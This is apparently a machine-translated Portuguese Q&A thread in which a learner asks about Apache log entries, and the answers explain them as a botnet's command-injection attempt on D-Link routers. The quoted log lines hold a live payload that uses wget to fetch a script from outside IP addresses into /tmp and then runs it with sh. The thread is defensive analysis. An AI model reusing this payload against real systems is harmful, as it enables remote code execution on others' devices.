Estou construindo um novo servidor Apache, na verdade estou aprendendo, então estou tentando coisas diferentes. Meu sistema de segurança já está pronto, mas é claro que posso perder alguma coisa ou, se não, entendo que hoje nenhum sistema pode me proteger 100%. Então, por que eu acho que alguém me tentou, só porque recebi em meus logs isto:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
Havia mais. Entendo que esse alguém está recebendo o erro 400 e isso não é ruim para mim. Então, na verdade a minha dúvida não é se eles me tentam, porque acho que sim, porque não parece uma solicitação normal ao meu site. Quero obter uma explicação deste pedido para entender e aprender. O que eles realmente estão tentando fazer, encontrar meu sistema de login e enviá-lo para algum lugar?
PS Já sei que com wgetvocê pode baixar algum site, também descobri que login.cgié um programa de autenticação baseado em cookies.
Obrigado!
Responder1
Seu visitante indesejado não está tentando esconder sua tentativa de baixar e executar algum script em seu servidor.
Ele pode estar esperando que, além de você ter esse login.cgiscript em vigor, ele também não esteja entregando corretamente sua entrada, executando diretamente tudo após o apóstrofo ( %27no log codificado). Você provavelmente não possui um script tão vulnerável, mas a suposição de que o código HTTP 400 sempre significa que você não foi afetado é infundada.
Este é provavelmente um ataque autônomo, direcionado a grandes grupos de alvos aleatórios. Só podemos especular o que o script que deveria ser baixado e executado poderia conter. É seguro assumir que você não será capaz de determinar isso, porque o servidor que entrega o script normalmente fornecerá scripts diferentes (+) dependendo se ele está assumindo que o ataque foi bem-sucedido até o momento ou está sendo investigado.
É perfeitamente possível que a execução do código também tenha sido considerada improvável pelo invasor; em vez disso, ele estava apenas coletando informações em seu sistema. Todos os dispositivos voltados para a Internet devem esperar tais solicitações regularmente e todos os scripts em seu servidor web devem ser escritos de forma que você nunca precise se preocupar com isso.
(+)Por queum invasor forneceria scripts diferentes? Para dificultar a investigação do escalonamento de privilégios pós-comprometimento. O script provavelmente seria perdido da memória posteriormente, portanto, garantir que a vítima não consiga recuperá-lo posteriormente faz sentido para o invasor.Comoo invasor forneceria scripts diferentes? Ele garantiria que o servidor web respondesse apenas com a carga de ataque do IP das máquinas atacadas, logo após o ataque. Como o ataque só pode ter sucesso instantaneamente ou falhar, qualquer recuperação posterior do script pode ser atribuída à equipe forense da vítima ou aos pesquisadores de segurança. Este não é um mecanismo novo ou puramente teórico, eu já recebi - em 2016 - cargas úteis diferentes com base em IPs (um script está vazio, o outro contém comandos para carregar uma carga útil de terceiro estágio).
Responder2
Não é um ataque específico a você pessoalmente. Muito provavelmente, um botnet é usado para atacar muitos endereços IP possíveis.
O login.cliscript que usa um parâmetro cliparece ser direcionado para roteadores D-Link. Provavelmente é uma variante deD-Link DSL-2750B - Injeção de comando do sistema operacional:
Este módulo explora uma vulnerabilidade de injeção de comando remoto em dispositivos D-Link DSL-2750B. A vulnerabilidade pode ser explorada através do parâmetro “cli” que é usado diretamente para invocar o binário “ayecli”. Firmwares vulneráveis vão de 1.01 a 1.03.
Existem coleções de listas de bloqueio para servidores web como nginx ou Apache que você pode usar para bloquear todas essas solicitações. Dependendo do seu tráfego, pode ser útil fazer isso, especialmente se você tiver um pequeno site privado que não espera muito tráfego.
Responder3
Sei que este post tem pouco mais de um ano, no entanto, posso acrescentar um pouco de clareza a isso.
Na verdade, faz parte de uma botnet. O script que ele está tentando baixar é um conta-gotas que tenta fazer o download, adicionar bits/permissões executáveis ao arquivo baixado (arquivo descartado) e executar e remover o arquivo.
Fiz algumas análises sobre a nova versão deste dropper, é um shell script não codificado. Esta rede tornou-se ativa novamente hoje, à medida que nos aproximamos de 2020.
Quanto à questão de usar scripts diferentes, o desenvolvedor poderia ter feito scripts separados para rodar em sistemas operacionais diferentes. Parece que alguém reempacotou este botnet e está tentando redistribuí-lo. Aqui está um total de vírusGráficoque mostra a nova atividade deste botnet específico.